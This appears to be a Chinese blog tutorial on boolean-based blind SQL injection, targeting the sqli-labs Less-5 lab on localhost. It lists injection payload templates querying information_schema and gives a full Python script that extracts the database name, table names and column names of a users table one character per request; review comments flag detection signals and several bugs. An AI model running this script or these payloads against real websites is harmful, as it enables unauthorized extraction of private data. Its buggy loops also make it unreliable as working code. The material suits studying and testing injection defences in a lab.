sql盲注(附python脚本)

前言

写在前面：学 SQL 盲注最麻烦的莫过于脚本编写，我会努力学习算法，目前代码效率还是太低。

select user(); 取得当前登录 MySQL 数据库的账户名
select top 1:SELECT TOP 子句规定要返回的记录的数目.
1。基于布尔的sql注入

上图展示了通过布尔注入确定出当前登录账户名的过程

布尔盲注知识点(Python脚本代码)

布尔注入通过网页的正常反馈信息确定值.
以下是关于几个注入用到函数

  1. length((select x from x where x ))
  2. ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 –+
    （substr(a,b,c)：从字符串 a 的第 b 位开始截取 c 个字符。）
  3. ascii(substr((select database(),1,1)))=98
  4. regexp正则注入(没用到,技术不够,有机会再补)

布尔盲注:
1.猜解数据库长度>>猜解数据库名>>猜解表数>>猜解表长度>>猜解表名>>猜解需要表列个数>>猜解admin表各列的长度>>猜解admin各列的列名>>猜解admin每个列字段数>>猜解每个字段长度>>爆破每个字段值
url="http://127.0.0.1/sqlilabs/Less-5/?id=1'"

猜解数据库长度

%d=(select length(database()))

猜解数据库名字

%d=ascii(substr(database(),%d,1))

猜解表数

%d=(select count(table_name) from information_schema.tables where table_schema=database())--+

猜解表名长度

%d=length((select table_name from information_schema.tables where table_schema=database() limit %d,1 ))--+

猜解表名

%d=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1 ),%d,1))--+

猜解需要表列个数

%d=(select count(column_name) from information_schema.columns where table_name = "%s")--+

猜解admin表各列的长度

%d=length((select column_name from information_schema.columns where table_name="users" limit %d,1 ))--+
![](./猜解admin表各列的长度.png)

猜解admin各列的列名

%d=ascii(substr((select column_name from information_schema.columns where table_name="users" limit %d,1),%d,1))--+

计算每个列的字段数select count(id) from users;

猜解每个字段长度 select length((select id from users limit 0,1))

猜解每个字段值select ascii(substr((select id from users limit 0,1),1,1))

import requests
# Shared state for the boolean-based blind probe below.  Every value is
# recovered one request at a time: the script asks the lab page a yes/no
# question and checks whether the 'You are in...........' marker appears.
db_length=1      # guessed length of database()
db_url=''        # probe url of the length loop
db_name=''       # recovered database name, appended one chr() at a time
db_ascii=1       # ascii candidate for the current character of db_name
db_place=1       # 1-based position within database() being probed
tb_sum=1         # guessed number of tables in the current schema
tb_url=''        # probe url of the table-count loop
tb_num1=0        # 0-based `limit` offset of the table being probed
tb_lname=0       # candidate length of one table name
tb_array=[]      # lengths of the table names, in `limit` order
tb_nameasc=0     # ascii candidate for the current character of tb_name
tb_namenum=0     # `limit` offset of the table whose name is being read
tb_namepla=0     # 1-based position within that table name
tb_nameurl=''    # probe url of the table-name loop
tb_name=''       # table name being assembled
tb_arrayname=[]  # recovered table names, in `limit` order
#Guess the length of database().  The lab page (sqli-labs Less-5 on
#127.0.0.1) renders the same page for every probe; the only signal is
#whether 'You are in...........' is present, i.e. whether the injected
#comparison evaluated true.  One GET per candidate length, 1..99.
#From the defender's side every probe is the same path with a sequential
#number in the `id` parameter -- the run of near-identical requests is what
#a request log or WAF rule can key on, and the oracle disappears entirely if
#the lab's query bound `id` as a parameter instead of concatenating it.
print('开始猜解数据库名长度')
url="http://127.0.0.1/sqlilabs/Less-5/?id=1'"   
for db_length in range(1,100):
    # The `'` already in url presumably closes a quoted literal in the lab's
    # query; `--+` comments out whatever follows the injected comparison.
    db_url=url+'and %d=(select length(database()))--+'%(db_length)
    r=requests.get(db_url)
    if 'You are in...........' in r.text:
        print('[!] '+db_url)
        print('猜解结束')
        break
    else:
        print('[x] '+db_url)
# NOTE(review): if no candidate matched, the loop leaves db_length at 99 and
# the name loop below runs with that value; "not found" and a real length
# of 99 are indistinguishable here.
print('数据库名长度:%d'%(db_length))        
#Guess the database name character by character:
#  ascii(substr(database(),x,1)) is compared with every code 0..126, one
#  request per candidate, for each position 1..db_length.
print('----------------------------------------------')
print('\n\n正在猜解数据库名.......')
# NOTE(review): this assignment is dead -- the loop below rebuilds the url
# from `url` on every iteration and never reads this value.
db_urlname='and %d=ascii(substr(database(),%d,1))--+'%(db_ascii,db_place)
for db_place in range(1,db_length+1):
    for db_ascii in range(0,127):
        db_urlname=url+'and %d=ascii(substr(database(),%d,1))--+'%(db_ascii,db_place)
        r=requests.get(db_urlname)
        if 'You are in...........' in r.text:
            db_name=db_name+chr(db_ascii)
            print('[!] '+db_name)
            break
        else:
            continue
    # NOTE(review): a position whose character never matched (any code
    # >= 127) is skipped silently, so db_name can end up shorter than
    # db_length without a warning.
print('end.......')
print('数据库名:'+db_name)
#Guess the number of tables in the current schema (candidates 1..9):
#  select count(table_name)  from information_schema.tables where table_schema='security';
print('\n\n开始猜解表数.......')
for tb_sum in range(1,10):
    tb_url=url+'and %d=(select count(table_name)  from information_schema.tables where table_schema=database())--+'%(tb_sum)
    r=requests.get(tb_url)
    if 'You are in...........' in r.text:
        print('[!] '+tb_url)
        break
    else:
        print('[x] '+tb_url)
# NOTE(review): as with db_length, a schema with ten or more tables leaves
# tb_sum at 9 with no error, and every later loop then only sees nine.
print('猜解表数结束')
print('表数:%d'%(tb_sum))
#Guess the length of each table name (candidates 1..19):
#  select length((select table_name from information_schema.tables where table_schema=database() limit 0,1 ));
#+-----------------------------------------------------------------------------------------------------+
#| length((select table_name from information_schema.tables where table_schema=database() limit 0,1 )) |
#+-----------------------------------------------------------------------------------------------------+
#|                                                                                                   6 |
# +-----------------------------------------------------------------------------------------------------+
# 1 row in set (0.00 sec)

# mysql> show tables;
# +--------------------+
# | Tables_in_security |
# +--------------------+
# | emails             |
# | referers           |
# | uagents            |
# | users              |
# +--------------------+
# 4 rows in set (0.00 sec)
print('\n\n开始猜解每一个表名长度')
# NOTE(review): range(0,tb_sum+1) runs tb_sum+1 times, so the last `limit`
# offset is one past the final table.  That probe presumably yields NULL,
# nothing matches and nothing is appended -- harmless, but 19 wasted
# requests.  The name loop further down uses range(0,tb_sum), which is the
# bound intended here.
for tb_num1 in range(0,tb_sum+1):
    for tb_lname in range(1,20):
        tb_lengthurl=url+'and %d=length((select table_name from information_schema.tables where table_schema=database() limit %d,1 ))--+'%(tb_lname,tb_num1)
        r=requests.get(tb_lengthurl)
        if 'You are in...........' in r.text:
            tb_array.append(tb_lname)
            print('[!] %d'%(tb_lname)+'>>%s'%(tb_lengthurl))
            # NOTE(review): this reset has no effect -- the for statement
            # rebinds tb_lname on its next iteration.
            tb_lname=0
            break
        else:
            continue
# NOTE(review): a table name of 20+ characters produces no hit and no
# entry, so tb_array can be shorter than tb_sum; the name loop below then
# raises IndexError on tb_array[tb_namenum].
for i in range(0,len(tb_array)):
    print('猜解结束第%d个表名长度分别为:%d'%(i+1,tb_array[i]))
print('猜解各个表名长度结束')
print('\n\n')
#Guess each table name character by character:
#  select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1  ),1,1);
#For every table offset, every position 1..length and every code 0..127 a
#separate request is issued -- up to 128 per character.
print('猜解各个表名开始...........')
for tb_namenum  in range(0,tb_sum):
    # tb_array[tb_namenum] raises IndexError if the length loop above found
    # no length for this table.
    for tb_namepla in range(1,tb_array[tb_namenum]+1):
        for tb_nameasc in range(0,128):
            tb_nameurl=url+'and %d=ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1  ),%d,1))--+'%(tb_nameasc,tb_namenum,tb_namepla)
            r=requests.get(tb_nameurl)
            if 'You are in...........' in r.text:
                tb_name=tb_name+chr(tb_nameasc)
                print('[!] '+tb_name)
                break
            else:
                continue
    # One name is complete; store it and start the next with an empty buffer.
    tb_arrayname.append(tb_name)
    tb_name=''
    print('\n')
for i in range(0,len(tb_arrayname)):
    print('猜解结束第%d个表名为:%s'%(i+1,tb_arrayname[i]))
#Guess the column count (candidates 1..9) of every recovered table.
cl_osum=[]   # column counts, appended only when a candidate matches
print('\n\n开始猜解列个数...........')
for i in range(tb_sum):
    for j in range(1,10):
        # Only table_name is filtered, not table_schema, so a same-named
        # table in another schema would be counted as well.
        cl_sumurl = url+'and %d=(select count(column_name) from information_schema.columns where table_name = "%s")--+'%(j,tb_arrayname[i])
        r=requests.get(cl_sumurl)
        if 'You are in...........' in r.text:
            cl_osum.append(j)
            print('[!] '+cl_sumurl+'>>匹配成功')
            break
        else:
            continue
# NOTE(review): cl_osum only grows on a hit, so one table with 10+ columns
# shifts every later index against tb_arrayname and the final cl_osum[i]
# raises IndexError.
for i in range(0,tb_sum):
    print(tb_arrayname[i]+'列数:%d'%(cl_osum[i]))
print('猜解列个数结束')
#Column count of one table, as seen directly in mysql:
##mysql> select count(column_name) from information_schema.columns where table_name = 'users' limit 0,1;
#+--------------------+
#| count(column_name) |
#+--------------------+
#|                  3 |
#+--------------------+
#1 row in set (0.01 sec)

# (An earlier copy of the column-count loop above was left here commented
# out; it duplicated the live loop and has been dropped.)
cl_lensum=[]   # NOTE(review): never read anywhere below
cl_lennam=[]   # lengths of the column names of `users`, in `limit` order
#Only the column lengths of the users table are needed from here on.
# NOTE(review): both the table name "users" and the bound range(0,4) are
# hard-coded rather than taken from tb_arrayname / cl_osum recovered above;
# the mysql output shows three columns, so the fourth offset is wasted and,
# as in the table-length loop, a 20+ character column name leaves a gap in
# cl_lennam.
for j in range(0,4): 
    for l in range(1,20):
        cl_len=url+'and %d=length((select column_name from information_schema.columns where table_name="users" limit %d,1 ))--+'%(l,j)
        r= requests.get(cl_len)
        if 'You are in...........' in r.text:
            cl_lennam.append(l)
            print('users>>第%d列长度为:%d'%(j+1,l))
            break
        else:
            continue
print('\n')
print(cl_lennam)
#Guess the column names of users character by character:
#select ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1));
#+-------------------------------------------------------------------------------------------------------------+
#| ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) |
#+-------------------------------------------------------------------------------------------------------------+
#|                                                                                                         105 |
#+-------------------------------------------------------------------------------------------------------------+
#1 row in set (0.01 sec)
#We want the names of the three columns of the users table.
cl_name=''     # column name being assembled
cl_namearr=[]  # recovered column names of `users`, in `limit` order
for j in range(0,3):
    # NOTE(review): range(cl_lennam[j]+1) starts at position 0.  In MySQL
    # substr(...,0,1) is '' and ascii('') is 0, so the cl_ascii=0 probe
    # matches and every name picks up a leading '\x00'; the strip('\x00')
    # after the loop exists to compensate for that.
    for i in range(cl_lennam[j]+1):
        for cl_ascii in range(0,128):
            cl_admin=url+'and %d=ascii(substr((select column_name from information_schema.columns where table_name="users" limit %d,1),%d,1))--+'%(cl_ascii,j,i)
            r= requests.get(cl_admin)
            # NOTE(review): this loop matches on the shorter 'You are in'
            # while every earlier loop uses 'You are in...........'.
            if 'You are in' in r.text:
                cl_name=cl_name+chr(cl_ascii)
                print('[~]'+cl_name)
                break
            else:
                continue
    cl_name=cl_name.strip('\x00')
    cl_namearr.append(cl_name)
    cl_name=''
    print('\n')
print(cl_namearr)